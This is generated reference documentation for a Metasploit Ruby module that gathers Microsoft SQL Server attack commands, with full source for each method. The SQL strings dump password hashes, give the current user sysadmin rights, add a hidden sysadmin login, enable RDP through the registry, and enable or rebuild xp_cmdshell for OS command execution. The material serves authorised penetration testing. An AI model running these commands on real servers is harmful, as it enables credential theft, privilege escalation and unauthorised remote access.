Module: Msf::Exploit::Remote::MSSQL_COMMANDS

Included in:

MSSQL, Post::Windows::MSSQL, Rex::Proto::MSSQL::Client

Defined in:

lib/msf/core/exploit/remote/mssql_commands.rb

Overview

This module provides MSSQL specific commands in a centralized manner.

Instance Method Summary

• #mssql_2k5_password_hashes(opts = {}) ⇒ Object
• #mssql_2k_password_hashes(opts = {}) ⇒ Object
• #mssql_current_user_escalation(opts = {}) ⇒ Object

  Add SQL current user to sysadmin group.

• #mssql_db_names(opts = {}) ⇒ Object
• #mssql_enumerate_servername(opts = {}) ⇒ Object

  Grab servername.

• #mssql_is_sysadmin(opts = {}) ⇒ Object
• #mssql_rdp_enable(opts = {}) ⇒ Object

  Turn on RDP.

• #mssql_rebuild_xpcmdshell(opts = {}) ⇒ Object

  Rebuild xp_cmdshell if it was deleted.

• #mssql_sa_escalation(opts = {}) ⇒ Object

  Add random user and random password to “sa” role on MSSQL.

• #mssql_sql_info(opts = {}) ⇒ Object

  Get SQL Server Version Info.

• #mssql_sql_xpcmdshell_disable_2000(opts = {}) ⇒ Object

  Disable the xp_cmdshell stored procedure in 2000.

• #mssql_xpcmdshell_disable(opts = {}) ⇒ Object

  Disable the xp_cmdshell stored procedure on 2005 and 2008.

• #mssql_xpcmdshell_enable(opts = {}) ⇒ Object

  Re-enable the xp_cmdshell stored procedure in 2005 and 2008.

• #mssql_xpcmdshell_enable_2000(opts = {}) ⇒ Object

  Re-enable the xp_cmdshell stored procedure on 2000.

Instance Method Details

#mssql_2k5_password_hashes(opts = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 64

def mssql_2k5_password_hashes(opts={})
  "SELECT name, password_hash FROM master.sys.sql_logins"
end

#mssql_2k_password_hashes(opts = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 68

def mssql_2k_password_hashes(opts={})
  "SELECT name, password FROM master..sysxlogins"
end

#mssql_current_user_escalation(opts = {}) ⇒ Object

Add SQL current user to sysadmin group

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 60

def mssql_current_user_escalation(opts={})
  "declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'"
end

#mssql_db_names(opts = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 76

def mssql_db_names(opts={})
  "SELECT name FROM master..sysdatabases"
end

#mssql_enumerate_servername(opts = {}) ⇒ Object

Grab servername

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 43

def mssql_enumerate_servername(opts={})
  "SELECT @@SERVERNAME"
end

#mssql_is_sysadmin(opts = {}) ⇒ Object

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 72

def mssql_is_sysadmin(opts={})
  "SELECT is_srvrolemember('sysadmin')"
end

#mssql_rdp_enable(opts = {}) ⇒ Object

Turn on RDP

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 38

def mssql_rdp_enable(opts={})
  "exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 0';"
end

#mssql_rebuild_xpcmdshell(opts = {}) ⇒ Object

Rebuild xp_cmdshell if it was deleted

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 33

def mssql_rebuild_xpcmdshell(opts={})
  "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;"
end

#mssql_sa_escalation(opts = {}) ⇒ Object

Add random user and random password to “sa” role on MSSQL

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 53

def mssql_sa_escalation(opts={})
  var_username = opts[:username] || rand_text_alpha(5)
  var_password = opts[:password] || rand_text_alpha(10)
  "exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'"
end

#mssql_sql_info(opts = {}) ⇒ Object

Get SQL Server Version Info

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 48

def mssql_sql_info(opts={})
  "SELECT @@VERSION"
end

#mssql_sql_xpcmdshell_disable_2000(opts = {}) ⇒ Object

Disable the xp_cmdshell stored procedure in 2000

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 28

def mssql_sql_xpcmdshell_disable_2000(opts={})
  "exec sp_dropextendedproc 'xp_cmdshell';"
end

#mssql_xpcmdshell_disable(opts = {}) ⇒ Object

Disable the xp_cmdshell stored procedure on 2005 and 2008

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 23

def mssql_xpcmdshell_disable(opts={})
  "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;"
end

#mssql_xpcmdshell_enable(opts = {}) ⇒ Object

Re-enable the xp_cmdshell stored procedure in 2005 and 2008

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 13

def mssql_xpcmdshell_enable(opts={})
  "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
end

#mssql_xpcmdshell_enable_2000(opts = {}) ⇒ Object

Re-enable the xp_cmdshell stored procedure on 2000

# File 'lib/msf/core/exploit/remote/mssql_commands.rb', line 18

def mssql_xpcmdshell_enable_2000(opts={})
  "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';"
end